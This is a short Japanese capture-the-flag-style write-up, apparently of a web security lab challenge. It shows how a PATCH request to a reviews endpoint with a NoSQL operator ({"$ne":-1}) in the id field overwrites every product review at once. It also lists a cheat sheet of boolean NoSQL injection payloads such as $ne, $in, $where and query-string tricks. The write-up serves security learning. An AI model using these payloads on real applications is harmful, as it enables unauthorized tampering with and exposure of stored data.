Hello there, ('ω')ノ

 

複数の製品レビューを同時に更新しなさいと。

 

 

まずは、レビューを書いて動作確認を。

 

 

パラメータのあるリクエストをリピータへ。

 

 

PUTメソッドは、POSTと違ってリソース名を指定して。

作成もしくは更新をかけるメソッドで。

メッセージを変更して、Sendすると。

 

 

正常に追加されていて。

 

 

メソッドをGETに変更してSendしてみると。

productが1の情報がすべて取得できて。

　GET /rest/products/1/reviews

 

 

すべてのproductということで、番号を削除してSendしてみるとうまくいかず。

　GET /rest/products/reviews

 

 

番号の代わりに*でも。

　GET /rest/products/*/reviews

 

 

次に負の数字だと。

　GET /rest/products/-1/reviews

 

 

URLのパラメータに番号があると製品を指定することになるので削除して。

リソースを部分（メッセージのみ）更新したいのでPATCHメソッドに変更して。

　PATCH /rest/products/reviews

 

すべてのidを対象としたいので、ありえないidを指定してインジェクションを。

　{

　　"id":{"$ne":-1},

　　"message":"rev plus plus plus"

　}

 

ちなみにBoolean Injection Cheatsheetは、下記のとおりで。

　{"$ne": -1}
　{"$in": []}
　{"$and": [ {"id": 5}, {"id": 6} ]}
　{"$where": "return true"}
　{"$or": [{},{"foo":"1"}]}
　site.com/page?query=term || '1'=='1
　site.com/page?user[$ne]=nobody
　site.com/page?user=;return true

 

 

クリアできた。

 

 

念のため確認を。

 

 

Best regards, (^^ゞ